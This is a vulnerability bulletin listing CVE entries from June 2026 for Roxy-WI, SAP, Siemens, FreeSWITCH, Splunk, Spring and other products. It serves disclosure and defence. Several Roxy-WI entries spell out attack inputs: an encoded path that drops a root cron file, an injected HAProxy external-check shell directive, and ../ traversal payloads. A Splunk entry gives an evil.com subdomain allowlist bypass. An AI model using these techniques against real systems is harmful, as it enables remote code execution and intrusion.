| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, the install blueprint declares only bp.before_request → @jwt_required() (app/routes/install/routes.py:36-39). The individual endpoints install_exporter, install_waf, install_geoip, check_geoip, get_exporter_version, and get_task_status are not wrapped in page_for_admin and do not call roxywi_common.is_user_has_access_to_its_group(server_ip) or check_is_server_in_group(server_ip). Only the GET index page (install_monitoring) gates on roxywi_auth.page_for_admin(level=2). Because the missing decorators omit both role and group checks, any logged-in user - including the default guest role 4 - can install/reconfigure exporters, WAF, and GeoIP databases on every server in the Roxy-WI database, regardless of tenant ownership. The Ansible playbooks run with the per-server SSH credential stored in Roxy-WI, which the credentials' rightful owner (a different tenant) has provisioned with sudo rights for the management workflow. At time of publication, there are no publicly available patches. | 2026-06-10 | 9.9 | CVE-2026-45552 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, POST /waf/<service>/<server_ip>/rule/<rule_id>/save accepts a config_file_name form field that is passed straight through to config_mod.master_slave_upload_and_restart(...) as the destination path. The validation chain (_replace_config_path_to_correct → check_is_conf) only requires the path to contain a hard-coded service substring (nginx/haproxy/apache2/httpd/keepalived) and the substring conf or cfg, and to not contain `..`. The encoded-slash substitution 92 → / is applied before the substring check, so the attacker can build any absolute path anywhere on the LB filesystem as long as it satisfies those substring constraints. The body of the WAF rule (config form field) is written verbatim to that path. By choosing a filename like 92etc92cron.d92nginx_cfg_evil (resolving to /etc/cron.d/nginx_cfg_evil), an attacker drops a cron entry on the load balancer with attacker-controlled content. Cron parses the file on its next scan, executing the embedded job as root - full RCE on every load balancer the caller's group manages. At time of publication, there are no publicly available patches. | 2026-06-10 | 9.9 | CVE-2026-45556 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, the HAProxy section-save endpoints (POST /api/service/haproxy/<server_id>/section/<section_type> and the PUT / global / defaults variants) accept a JSON option field that is not validated, not escaped, and is rendered verbatim into the generated HAProxy configuration via the section.j2, global.j2, and defaults.j2 Ansible templates. Because Roxy-WI then pushes the generated config to the load balancer and runs systemctl reload haproxy, an authenticated user with role ≤ 3 (user) can inject arbitrary HAProxy directives into the config that runs on every load balancer their group manages - including option external-check + external-check command /bin/bash -c '…', which gives remote code execution on the load balancer as the haproxy user on every health-check tick. At time of publication, there are no publicly available patches. | 2026-06-10 | 9.9 | CVE-2026-45558 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, agent_action (app/routes/smon/agent_routes.py:166-179) has decorators @bp.post('/agent/action/<action>') and @jwt_required() only - no role check, no group ownership check on the server_ip form field. Any authenticated user, including role 4 (guest), can start, stop, or restart the roxy-wi-smon-agent systemd unit on any server they can name. Roxy-WI executes the systemd action over its own SSH credentials (passwordless sudo), so the action runs as root on the target. At time of publication, there are no publicly available patches. | 2026-06-10 | 8.5 | CVE-2026-45549 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, POST /config/versions/<service>/<server_ip>/<configver>/save interpolates the URL-path configver parameter directly into a config-version path that ends up at os.system(f"dos2unix -q {cfg}"). configver is not run through EscapedString (Pydantic doesn't validate path segments declared as str) and the surrounding `..` block is the broken tuple-membership patch from GHSA-vapt-004. An authenticated user with role <= 3 ("user") therefore reaches a bin/sh -c command-injection sink. At time of publication, there are no publicly available patches. | 2026-06-10 | 8.8 | CVE-2026-45564 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, EscapedString (app/modules/roxywi/class_models.py:16-30) is the centralised Pydantic validator used on dozens of fields including SSH credential name, username, description, etc. Its if/elif/elif/else flow returns the metacharacter-stripped value without also enforcing the `..` block. An attacker who appends a single ;, &, |, $, or backtick to a `..` payload routes the value through the strip arm, where `..` survives unblocked and the result is not shlex.quote()'d either. At time of publication, there are no publicly available patches. | 2026-06-10 | 8.1 | CVE-2026-45565 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, there is an authentication bypass vulnerability via 'api' substring in URL + unauthenticated /api/gpt. At time of publication, there are no publicly available patches. | 2026-06-10 | 8.3 | CVE-2026-45567 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, commit d4d10006 ("Expand validation to block .. in config_file_name and configver for improved security") added a line in app/modules/config/config.py:462. This is tuple-membership, not substring containment - '..' in (a, b, c) evaluates to True only if any of a, b, c is equal to the literal string '..'. For any realistic path-traversal payload (../../etc/passwd, ..\\..\\etc\\passwd, etc.) the check returns False and the patch silently lets the payload through. At time of publication, there are no publicly available patches. | 2026-06-10 | 8.1 | CVE-2026-45569 |
| Ruijie--EG105G-P | A security flaw has been discovered in Ruijie EG105G-P 2.340. The impacted element is the function nslookup of the file /cgi-bin/luci/api/diagnose of the component JSON-RPC Diagnose Endpoint. Performing a manipulation of the argument params.target results in command injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 7.2 | CVE-2026-12197 |
| sahlberg--libnfs | libnfs through 6.0.2 before 55c18ea does not validate a string size, leading to an integer overflow during a connection to a crafted NFS server. This occurs in libnfs_zdr_string in lib/libnfs-zdr.c. | 2026-06-10 | 7.1 | CVE-2026-53689 |
| SAP_SE--SAP NetWeaver Application Server Java (Web Container) | SAP NetWeaver Application Server Java (Web Container) allows an unauthenticated attacker to craft a malicious HTTP logon request that manipulates file inclusion parameters, enabling path traversal and processing of the included file. Processing the included file could allow the attacker to view or modify sensitive information or render any part of the local system unavailable. | 2026-06-09 | 9 | CVE-2026-40128 |
| SAP_SE--SAP NetWeaver AS ABAP and ABAP Platform | Due to improper RFC protocol validation in the SAP Kernel used by the Application Server ABAP of SAP NetWeaver and ABAP Platform, an unauthenticated attacker can send a crafted RFC request that exploits logical errors in memory management, leading to memory corruption. This could lead to a high impact on the confidentiality, integrity, and availability of the application. | 2026-06-09 | 9.8 | CVE-2026-27671 |
| SAP_SE--SAP NetWeaver AS ABAP and ABAP Platform | SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered identity information leading to unauthorized access to sensitive user data and potential disruption of normal system usage. This causes a high impact on confidentiality, integrity and availability of the application. | 2026-06-09 | 9.9 | CVE-2026-44748 |
| SAP_SE--SAP NetWeaver AS ABAP and ABAP Platform | Application server ABAP does not perform necessary authorization checks for an authenticated user allowing an attacker to execute a report generation command which could overwrite information belonging to another user, resulting in escalation of privileges. This has high impact on integrity with low impact on availability and no impact on confidentiality of the application. | 2026-06-09 | 7.1 | CVE-2026-44751 |
| Siemens--SIMATIC WinCC Unified PC Runtime V16 | A vulnerability has been identified in SIMATIC WinCC Unified PC Runtime V16 (All versions), SIMATIC WinCC Unified PC Runtime V17 (All versions), SIMATIC WinCC Unified PC Runtime V18 (All versions), SIMATIC WinCC Unified PC Runtime V19 (All versions), SIMATIC WinCC Unified PC Runtime V20 (All versions), SIMATIC WinCC Unified PC Runtime V21 (All versions < V21 Update 2). Insufficient protection of key material in WinCC Certificate Manager that could allow an attacker to extract sensitive information. | 2026-06-09 | 7.1 | CVE-2026-24349 |
| Siemens--SINEC INS | A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 6). The application does not properly sanitize user input in the /api/sftp/uploadFiles endpoint, allowing the injection of shell command payloads via crafted directory names. These payloads are stored and executed when directory listings are retrieved. This could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system with the privileges of the affected service user (sinecins). | 2026-06-09 | 8.8 | CVE-2026-46746 |
| Siemens--SINEC INS | A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 6). The affected system includes a binary that is configured with the cap_dac_override capability. This capability allows the process to bypass file system permission checks, resulting in unrestricted file system access. This could allow a local attacker to escalate privileges leading to arbitrary file modification and gaining root privileges on the system. | 2026-06-09 | 8.8 | CVE-2026-46748 |
| Siemens--SINEC INS | A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 6). The affected application uses a password hashing implementation with a static, hardcoded salt shared across all users and installations, and is configured with an insufficient number of iterations. This could allow an attacker to efficiently recover user passwords using brute-force or precomputed attacks, potentially resulting in unauthorized access. | 2026-06-09 | 7.5 | CVE-2026-46749 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, esl_recv_event() parses Content-Length with atol() and passes the result straight to malloc(len + 1) with no sign or magnitude check. A malicious or man-in-the-middle ESL peer can send a frame with a negative Content-Length to corrupt the heap of, or crash, any process linked against libesl, before the client has authenticated to that peer. This issue has been patched in version 1.11.1. | 2026-06-09 | 9.1 | CVE-2026-49840 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, the mod_verto HTTP request handler allocates a fixed 2 MiB buffer for a POST application/x-www-form-urlencoded body but accepts Content-Length up to just under 10 MiB. The body-read loop is bounded by Content-Length rather than the buffer size, producing an attacker-controlled heap overflow of up to ~8 MiB -- before the HTTP basic-auth check runs. This issue has been patched in version 1.11.1. | 2026-06-09 | 9.8 | CVE-2026-49841 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.0, FreeSWITCH's bundled XML parser expands nested <!ENTITY> declarations without a depth or count bound, so a small DTD can describe a body that expands exponentially ("billion laughs"). The PIDF body of a SIP PUBLISH is fed to this parser before any digest check, letting an unauthenticated network attacker force unbounded CPU and memory consumption with a single request. This issue has been patched in version 1.11.0. | 2026-06-09 | 7.5 | CVE-2026-45771 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.0, a STUN packet whose declared attribute length is shorter than the structure the parser casts to causes the parser to read and write past the end of the attribute, producing an out-of-bounds memory access on the per-leg media buffer. This issue has been patched in version 1.11.0. | 2026-06-09 | 7.5 | CVE-2026-49475 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, mod_verto's WebSocket frame loop intercepts a #-prefixed speed-test protocol (#SPU / #SPB / #SPE) before any authentication check. The declared payload size in #SPU was parsed with atoi() and only rejected non-positive values, so an unauthenticated peer could request up to INT_MAX bytes. The server then wrote roughly size * 10 bytes back during the download phase, on the order of 20 GB per request, yielding strong outbound bandwidth amplification from a short request. This issue has been patched in version 1.11.1. | 2026-06-09 | 7.5 | CVE-2026-49842 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, a single unauthenticated WebSocket frame containing a deeply nested JSON document crashes the FreeSWITCH process via stack overflow, terminating all calls and sessions on the host. The recursion drives the worker thread's stack pointer into the stack guard page, raising SIGSEGV from the kernel before any usable write primitive develops. This issue has been patched in version 1.11.1. | 2026-06-09 | 7.5 | CVE-2026-49847 |
| SimpleHelp--SimpleHelp | SimpleHelp versions 5.5.15 and prior and 6.0 pre-release versions contain an authentication bypass vulnerability in the OIDC authentication flow. When OIDC authentication is configured, identity tokens submitted during login are accepted without verifying their cryptographic signature. In a vulnerable configuration, a remote, unauthenticated attacker can submit a forged token containing arbitrary identity claims to obtain a fully authenticated technician session. In some configurations, this may also allow bypass of multi-factor authentication. No user interaction is required. | 2026-06-12 | 10 | CVE-2026-48558 |
| simplesamlphp--simplesamlphp-module-casserver | SimpleSAMLphp-casserver is a CAS 1.0 and 2.0 compliant CAS server in the form of a SimpleSAMLphp module. Prior to version 7.0.3, simplesamlphp-module-casserver builds file paths for the file-based CAS ticket store by directly concatenating the configured ticket directory with an attacker-controlled ticket identifier. Public CAS validation/proxy endpoints pass attacker-controlled ticket / pgt query parameters into this store. In deployments using FileSystemTicketStore, a remote attacker can use path traversal sequences such as ../target.serialized to make the CAS server read and unserialize files outside the ticket directory. In the CAS 1.0 validation flow, the same attacker-selected path is also passed to deleteTicket() immediately after getTicket() returns, which can delete the target file when it is readable by the PHP process, deletable under the PHP process filesystem permissions, and unserializes to a value compatible with the ?array return type. This issue has been patched in version 7.0.3. | 2026-06-09 | 8.6 | CVE-2026-46491 |
| sixstorage--6Storage Rentals | The 6Storage Rentals plugin for WordPress is vulnerable to Authorization Bypass Through User-Controlled Key in all versions up to and including 2.22.0 via the `userId` parameter of the `six_storage_get_user_info` and `six_storage_update_profile` AJAX actions. This is due to the `six_storage_getUserInfo()` and `six_storage_updateProfile()` functions being registered on `wp_ajax_nopriv_*` hooks and accepting a tenant identifier directly from `$_POST['userId']` without performing any ownership verification, session binding, or nonce validation to confirm the requester has a legitimate relationship to the supplied ID. This makes it possible for unauthenticated attackers to read and modify arbitrary tenants' profile data - including name, email address, phone number, physical address, and SSN - by supplying an enumerated `userId` value in a crafted request to either handler. | 2026-06-09 | 7.5 | CVE-2026-9185 |
| Skilja GmbH--Vinna Process Monitor | A Stored Cross-Site Scripting vulnerability in Vinna Process Monitor Version 4.0 Service Pack 1 (Build 63255) allows an authenticated remote attacker with low privileges to inject malicious JavaScript code into the application. This enables attackers to steal administrative access tokens and session credentials. | 2026-06-09 | 8.7 | CVE-2026-41031 |
| Soagen Informatics Technologies Software and Consulting Inc.--Apinizer | Improper neutralization of special elements used in an expression language statement ('expression language injection') vulnerability in Soagen Informatics Technologies Software and Consulting Inc. Apinizer allows Code Injection. This issue affects Apinizer: from 2026.04.0 before 2026.04.6. | 2026-06-11 | 9.8 | CVE-2026-11561 |
| SolidInvoice--SolidInvoice | SolidInvoice is an open-source invoicing platform. Prior to version 2.3.17, the company logo upload feature accepts any file type without validation. An authenticated administrator can upload an SVG file containing embedded JavaScript. This script is base64-encoded and injected unescaped into every page of the application, causing stored cross-site scripting (XSS) that executes in every authenticated user's browser. This issue has been patched in version 2.3.17. | 2026-06-11 | 8.1 | CVE-2026-46489 |
| SolidInvoice--SolidInvoice | SolidInvoice is an open-source invoicing platform. Prior to version 2.3.17, API tokens used to authenticate all REST API requests are stored as plaintext strings in the api_tokens database table. Any attacker who obtains read access to the database - through SQL injection, a leaked backup, a misconfigured replica, or insider access - immediately obtains all API credentials for every user with no further effort. This issue has been patched in version 2.3.17. | 2026-06-11 | 8.1 | CVE-2026-46622 |
| Sonaar--Sonaar Music Plugin | WordPress Sonaar Music Plugin 4.7 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts through the comment functionality. Attackers can submit JavaScript payloads in the comment parameter to wp-comments-post.php which are stored and executed in the browsers of users viewing the affected playlist pages. | 2026-06-08 | 7.2 | CVE-2023-54351 |
| SourceCodester--Class and Exam Timetabling System | A vulnerability was found in SourceCodester Class and Exam Timetabling System 1.0. The impacted element is an unknown function of the file /index2.php. The manipulation of the argument Password results in SQL injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2026-06-08 | 7.3 | CVE-2026-11471 |
| SourceCodester--Class and Exam Timetabling System | A vulnerability was determined in SourceCodester Class and Exam Timetabling System 1.0. This affects an unknown function of the file /index1.php. This manipulation of the argument Password causes SQL injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 7.3 | CVE-2026-11472 |
| SourceCodester--Class and Exam Timetabling System | A vulnerability was identified in SourceCodester Class and Exam Timetabling System 1.0. The impacted element is an unknown function of the file /archive5.php. The manipulation of the argument sy leads to SQL injection. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2026-06-08 | 7.3 | CVE-2026-11482 |
| SourceCodester--Class and Exam Timetabling System | A security flaw has been discovered in SourceCodester Class and Exam Timetabling System 1.0. This affects an unknown function of the file /archive4.php. The manipulation of the argument sy results in SQL injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 7.3 | CVE-2026-11483 |
| SourceCodester--Class and Exam Timetabling System | A weakness has been identified in SourceCodester Class and Exam Timetabling System 1.0. This impacts an unknown function of the file /archive3.php. This manipulation of the argument sy causes SQL injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-08 | 7.3 | CVE-2026-11484 |
| SourceCodester--Class and Exam Timetabling System | A security vulnerability has been detected in SourceCodester Class and Exam Timetabling System 1.0. Affected is an unknown function of the file /archive2.php. Such manipulation of the argument sy leads to SQL injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-06-08 | 7.3 | CVE-2026-11485 |
| SourceCodester--Class and Exam Timetabling System | A vulnerability was detected in SourceCodester Class and Exam Timetabling System 1.0. Affected by this vulnerability is an unknown functionality of the file /archive1.php. Performing a manipulation of the argument sy results in SQL injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-06-08 | 7.3 | CVE-2026-11486 |
| SourceCodester--Hospitals Patient Records Management System | A security flaw has been discovered in SourceCodester Hospitals Patient Records Management System 1.0. This issue affects some unknown processing of the file /classes/Master.php?f=save_patient. The manipulation of the argument ID results in SQL injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 7.3 | CVE-2026-11501 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 10.4.2604.3 and 10.2.2510.14, an unauthenticated user could create or truncate arbitrary files through a PostgreSQL sidecar service endpoint. The vulnerability exists because the PostgreSQL sidecar service endpoint lacks authentication controls, allowing any network-reachable user to invoke file operations without credentials. | 2026-06-10 | 9.8 | CVE-2026-20253 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, Splunk Cloud Platform versions below 10.3.2512.12, 10.2.2510.14, 10.1.2507.22, and 9.3.2411.132, and Splunk Secure Gateway versions below 3.10.6, 3.9.20, and 3.8.67, a low-privileged user that does not hold the 'admin' or 'power' Splunk roles could perform a Remote Code Execution (RCE) through the Splunk Secure Gateway app. The Remote Code Execution is possible because of unsafe deserialization of App Key Value Store (KV Store) data through the 'jsonpickle' Python library, which reconstructs arbitrary Python objects from specially crafted JavaScript Object Notation (JSON) without adequate validation. | 2026-06-10 | 8.8 | CVE-2026-20251 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.4.2604.3, 10.3.2512.12, 10.2.2510.14, 10.1.2507.22, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could send server-side requests to arbitrary internal destinations through the Dashboard Studio PDF export feature. The vulnerability exists because the trusted-domain validation uses a prefix match that can be bypassed with attacker-controlled subdomains (for example, docs.splunk.com.evil.com), and because the PDF export service follows HTTP redirects automatically without re-validating each redirect target against the allowlist. | 2026-06-10 | 7.6 | CVE-2026-20252 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.11, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could store a malicious script in a classic dashboard HTML panel, causing unauthorized JavaScript code to execute in the browser of another user. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The low-privileged user should not be able to exploit the vulnerability at will. | 2026-06-10 | 7.1 | CVE-2026-20258 |
| Spring--Micrometer | In Micrometer, it is possible for a user to provide specially crafted gRPC requests that may cause a denial-of-service (DoS) condition. Affected versions: Micrometer 1.16.0 through 1.16.5; 1.15.0 through 1.15.11. | 2026-06-09 | 7.5 | CVE-2026-40983 |
| Spring--Micrometer | In Micrometer, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Affected versions: micrometer-core 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18; 1.9.0 through 1.9.17. micrometer-jetty11 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18. micrometer-jetty12 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18. | 2026-06-09 | 7.5 | CVE-2026-40984 |
| Spring--Spring Data Commons | Spring Data Commons applications may be vulnerable to denial of service through resource exhaustion when attacker-controlled property path strings are passed to MappingContext property path resolution. Affected versions: Spring Data Commons 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14. | 2026-06-09 | 7.5 | CVE-2026-41695 |
| Spring--Spring Data Commons | Spring Data's internal property-lookup cache accepts and permanently retains attacker-supplied strings as cache keys, allowing heap exhaustion through repeated requests. Affected versions: Spring Data Commons 2.7.0 through 2.7.19; 3.3.0 through 3.3.16; 3.4.0 through 3.4.14; 3.5.0 through 3.5.11; 4.0.0 through 4.0.5. | 2026-06-09 | 7.5 | CVE-2026-41716 |
| Spring--Spring Data MongoDB | Spring Data MongoDB contains a SpEL (Spring Expression Language) expression injection vulnerability. The issue occurs during parameter binding when a user-defined repository query method is annotated with @Query and utilizes a capture-all placeholder. Affected versions: Spring Data MongoDB 5.0.0 through 5.0.5; 4.5.0 through 4.5.11; 4.4.0 through 4.4.14; 4.3.0 through 4.3.16; 4.2.0 through 4.2.15; 4.1.0 through 4.1.14; 4.0.0 through 4.0.15; 3.4.0 through 3.4.19. | 2026-06-09 | 8.1 | CVE-2026-41717 |
| Spring--Spring Data REST | Spring Data REST is vulnerable to SpEL expression injection through map-typed properties when processing JSON Patch (application/json-patch+json) requests. When a persistent entity exposes a Map-typed property, the JSON Pointer path segment used as the map key is embedded directly into a SpEL expression without sanitization or validation. Affected versions: Spring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5. | 2026-06-09 | 8.1 | CVE-2026-41729 |
| Spring--Spring Data REST | Spring Data REST's JSON Patch (application/json-patch+json) implementation does not apply the write-access filter to intermediate path segments when resolving a multi-segment JSON Pointer. Affected versions: Spring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5. | 2026-06-09 | 7.5 | CVE-2026-41728 |
| Spring--Spring for Apache Kafka | JsonKafkaHeaderMapper and the deprecated DefaultKafkaHeaderMapper matched type headers against trusted packages using a prefix check, meaning that trusting any package implicitly trusted all of its subpackages. Combined with Jackson's default bean deserialization, a producer could supply crafted header values that caused the consumer to deserialize arbitrary JDK types. Affected versions: Spring for Apache Kafka 4.0.0 through 4.0.5; 3.3.0 through 3.3.15; 3.2.0 through 3.2.13; 2.9.0 through 2.9.13; 2.8.0 through 2.8.11. | 2026-06-09 | 8.1 | CVE-2026-41731 |
| Spring--Spring for Apache Pulsar | JsonPulsarHeaderMapper matched type headers against trusted packages using a prefix check, meaning that trusting any package implicitly trusted all of its subpackages. Additionally, an empty trusted-packages configuration fell back to trusting all packages rather than applying a safe default allow-list. Affected versions: Spring for Apache Pulsar 2.0.0 through 2.0.5; 1.2.0 through 1.2.17; 1.1.0 through 1.1.17. | 2026-06-09 | 8.1 | CVE-2026-41732 |
| Spring--Spring for GraphQL | Spring for GraphQL applications are vulnerable to Unsafe Deserialization when processing paginated GraphQL queries. An attacker can craft a malicious GraphQL request that can lead to Remote Code Execution when the application exposes a paginated (Connection) field and the classpath contains specific classes that can be leveraged during deserialization. Affected versions: Spring for GraphQL 2.0.0 through 2.0.3; 1.4.0 through 1.4.5; 1.3.0 through 1.3.8. | 2026-06-11 | 8.1 | CVE-2026-41699 |
| Spring--Spring for GraphQL | Spring for GraphQL applications that have enabled the WebSocket transport are vulnerable to Cross-Site WebSocket Hijacking. An attacker can trick an authenticated user into visiting a malicious page, allowing the attacker to execute arbitrary GraphQL operations with the victim's credentials. Affected versions: Spring for GraphQL 2.0.0 through 2.0.3; 1.4.0 through 1.4.5; 1.3.0 through 1.3.8; 1.0.0 through 1.0.6. | 2026-06-11 | 8.1 | CVE-2026-41700 |
| Spring--Spring for GraphQL | The Spring GraphQL annotation detection mechanism for @Controller data fetchers may not correctly resolve annotations on methods within type hierarchies. This can be an issue if such annotations are used for authorization decisions. When all conditions are met, security annotations can be ignored at runtime. Affected versions: Spring for GraphQL 2.0.0 through 2.0.3; 1.4.0 through 1.4.5; 1.3.0 through 1.3.8; 1.0.0 through 1.0.6. | 2026-06-11 | 7.5 | CVE-2026-41856 |
| Spring--Spring Framework | In an untrusted JMS environment, org.springframework.jms.support.converter.MappingJackson2MessageConverter and org.springframework.jms.support.converter.JacksonJsonMessageConverter allow arbitrary class instantiation, which can lead to unauthorized actions via gadget class deserialization. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 8.1 | CVE-2026-41855 |
| Spring--Spring Framework | Spring MVC and WebFlux applications are vulnerable to Denial of Service (DoS) attacks when resolving static resources. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 7.5 | CVE-2026-41842 |
| Spring--Spring Framework | Due to incorrect escaping, the use of JavaScriptUtils.javaScriptEscape() may lead to JavaScript code injection in the browser, potentially resulting in a cross-site scripting (XSS) vulnerability. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 7.1 | CVE-2026-41845 |
| Spring--Spring Framework | An integer overflow vulnerability exists in the evaluation logic of the Spring Expression Language (SpEL). An attacker can exploit this by supplying a specially crafted SpEL expression that triggers excessive resource consumption, resulting in a Denial of Service (DoS). Affected versions: Spring Framework 5.3.0 through 5.3.48. | 2026-06-09 | 7.5 | CVE-2026-41849 |
| Spring--Spring Framework | Applications that evaluate user-supplied Spring Expression Language (SpEL) expressions are vulnerable to an Algorithmic Denial of Service (DoS). By providing a specially crafted expression, an attacker can trigger excessive resource consumption during evaluation, leading to application degradation or unavailability. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 7.5 | CVE-2026-41850 |
| Spring--Spring HATEOAS | Spring HATEOAS's internal PropertyUtils.createObjectFromProperties method, used by the Collection+JSON and UBER media type deserializers, performs bean property binding via reflection without consulting Jackson access-control annotations. Affected versions: Spring HATEOAS 1.5.0 through 1.5.6; 2.3.0 through 2.3.4; 2.4.0 through 2.4.1; 2.5.0 through 2.5.2; 3.0.0 through 3.0.3. | 2026-06-09 | 7.5 | CVE-2026-41006 |
| Spring--Spring HATEOAS | Spring HATEOAS maintains an unbounded static cache of StringLinkRelation instances keyed on attacker-supplied strings. Affected versions: Spring HATEOAS 1.5.0 through 1.5.6; 2.3.0 through 2.3.4; 2.4.0 through 2.4.1; 2.5.0 through 2.5.2; 3.0.0 through 3.0.3. | 2026-06-09 | 7.5 | CVE-2026-41007 |
| Spring--Spring Integration | A malicious or compromised FTP/SFTP/SMB server can write arbitrary files anywhere on the client filesystem (outside the configured local-directory) with attacker-controlled content. Affected versions: Spring Integration 7.0.0 through 7.0.4; 6.5.0 through 6.5.8; 6.4.0 through 6.4.11; 6.3.0 through 6.3.14; 5.5.0 through 5.5.20. | 2026-06-11 | 7.1 | CVE-2026-40987 |
| Spring--Spring LDAP | Spring LDAP's DirContextAuthenticationStrategy implementations do not reject a bind request where a non-empty username is paired with an empty or null password. Affected versions: Spring LDAP 2.4.0 through 2.4.4; 3.2.0 through 3.2.17; 3.3.0 through 3.3.7; 4.0.0 through 4.0.3. | 2026-06-09 | 7.4 | CVE-2026-41720 |
| Spring--Spring Security | An application using spring-security-saml2-service-provider and the REDIRECT binding for SAML 2.0 Login or Logout may be vulnerable to a denial of service by way of an unbounded writer that inflates the compressed SAML payload into memory. Affected versions: Spring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5. | 2026-06-09 | 7.5 | CVE-2026-40988 |
| Spring--Spring Security | An attacker with write permissions to the database table managed by JdbcAssertingPartyMetadataRepository (saml2_asserting_party_metadata) may be able to store malicious serialized payloads in the columns containing the collection of verification or encryption credentials (verification_credentials and encryption_credentials, respectively). Affected versions: Spring Security 7.0.0 through 7.0.5. | 2026-06-09 | 7.3 | CVE-2026-40993 |
| Spring--Spring Security | An attacker able to influence values in RelyingPartyRegistration may be able to run arbitrary code on HTML forms generated by Spring Security filters. Affected versions: Spring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5. | 2026-06-09 | 7.6 | CVE-2026-41003 |
